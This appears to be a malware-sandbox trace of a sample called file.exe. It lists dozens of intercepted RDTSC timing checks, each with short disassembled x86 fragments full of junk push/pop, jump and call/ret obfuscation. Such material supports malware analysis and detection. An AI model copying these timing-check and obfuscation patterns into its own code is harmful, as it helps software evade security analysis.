              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2259 second address: 7F2267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C120028Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2267 second address: 7F2289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Eh 0x00000007 jnl 00007FE4C10F4F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FE4C10F4F66h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2289 second address: 7F228D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E761C second address: 7E764A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FE4C10F4F6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE4C10F4F77h 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2596 second address: 7F259B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F417A second address: 7F417F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4879 second address: 7F487F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F487F second address: 7F489E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9298 second address: 7F929C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B794F second address: 7B7954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD530 second address: 7FD538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD538 second address: 7FD53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD53E second address: 7FD542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD542 second address: 7FD577 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007FE4C10F4F73h 0x00000014 jmp 00007FE4C10F4F6Fh 0x00000019 pop esi 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD577 second address: 7FD586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C120028Ah 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD586 second address: 7FD599 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C10F4F6Bh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD70F second address: 7FD71B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FE4C1200286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD85C second address: 7FD86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FE4C10F4F6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE307 second address: 7FE30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE5FA second address: 7FE62D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jnp 00007FE4C10F4F68h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE4C10F4F71h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE7D6 second address: 7FE7DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE7DC second address: 7FE7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FED22 second address: 7FED2C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FED2C second address: 7FED36 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4C10F4F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8012A2 second address: 8012A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8012A8 second address: 8012AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8012AC second address: 801322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jg 00007FE4C120028Ch 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D19F0h], esi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FE4C1200288h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D2851h], ebx 0x0000003e xchg eax, ebx 0x0000003f jmp 00007FE4C1200296h 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801322 second address: 801326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801CFF second address: 801D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C1200295h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B416D second address: 7B4177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4177 second address: 7B41C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE4C1200297h 0x0000000f jmp 00007FE4C120028Fh 0x00000014 jmp 00007FE4C120028Eh 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B41C7 second address: 7B41E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F77h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B41E4 second address: 7B41EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B41EA second address: 7B41EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8069EE second address: 8069F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8074CF second address: 807501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F79h 0x00000009 popad 0x0000000a push ebx 0x0000000b jo 00007FE4C10F4F66h 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 jbe 00007FE4C10F4F66h 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807501 second address: 807507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807CF0 second address: 807CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B081 second address: 80B0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE4C1200288h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov ebx, 0A255A04h 0x00000029 push 00000000h 0x0000002b jmp 00007FE4C120028Ch 0x00000030 push eax 0x00000031 jbe 00007FE4C12002ACh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE4C1200296h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0A7 second address: 80C0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D2A2 second address: 80D2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D2A6 second address: 80D2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E1FF second address: 80E220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FE4C120028Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E220 second address: 80E224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E224 second address: 80E2A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FE4C120028Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FE4C120028Ah 0x00000011 jo 00007FE4C1200291h 0x00000017 pushad 0x00000018 mov dword ptr [ebp+1247C9E0h], edx 0x0000001e adc dh, 0000000Ch 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov di, cx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FE4C1200288h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 jmp 00007FE4C1200297h 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FE4C120028Eh 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F1D8 second address: 80F1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d js 00007FE4C10F4F70h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E40E second address: 80E412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101DD second address: 8101E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101E1 second address: 8101E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F308 second address: 80F30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F30C second address: 80F325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE4C120028Fh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F325 second address: 80F32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811366 second address: 81139A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE4C1200292h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE4C1200299h 0x00000014 jmp 00007FE4C1200293h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814420 second address: 814438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C10F4F74h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81548A second address: 81548E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81548E second address: 815494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8146A6 second address: 8146AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816606 second address: 81660A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8156B0 second address: 8156D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE4C1200299h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81660A second address: 8166A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FE4C10F4F74h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FE4C10F4F68h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+122D2CD8h], ecx 0x0000002f pop ebx 0x00000030 jmp 00007FE4C10F4F6Ch 0x00000035 push 00000000h 0x00000037 jc 00007FE4C10F4F6Bh 0x0000003d and di, 06CEh 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FE4C10F4F68h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D36B8h], edi 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jnl 00007FE4C10F4F75h 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8156D5 second address: 8156D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8166A5 second address: 8166AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8166AA second address: 8166B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8166B6 second address: 8166C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8174FB second address: 81756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007FE4C120028Ch 0x0000000b jg 00007FE4C1200286h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push edx 0x00000016 ja 00007FE4C1200286h 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FE4C1200288h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 jnc 00007FE4C1200287h 0x0000003f push 00000000h 0x00000041 jns 00007FE4C1200294h 0x00000047 jmp 00007FE4C120028Ah 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81756C second address: 817573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817573 second address: 81758D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C1200296h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81758D second address: 8175A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175A6 second address: 8175AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175AA second address: 8175B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE4C10F4F66h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175B8 second address: 8175BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8184F4 second address: 8184F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819414 second address: 819422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819422 second address: 819427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81870E second address: 818713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819427 second address: 81942C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81942C second address: 81948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FE4C1200288h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 and edi, dword ptr [ebp+122D2E16h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FE4C1200288h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov bx, dx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81948C second address: 819491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819491 second address: 819497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819497 second address: 81949B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81949B second address: 81949F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CA4A second address: 81CA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CA4E second address: 81CA58 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CA58 second address: 81CA87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE4C10F4F76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F858 second address: 81F86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FE4C120028Bh 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F86C second address: 81F871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823A47 second address: 823A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8234C7 second address: 8234CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5D22 second address: 7B5D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8293DB second address: 8293F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FE4C10F4F66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f js 00007FE4C10F4F70h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
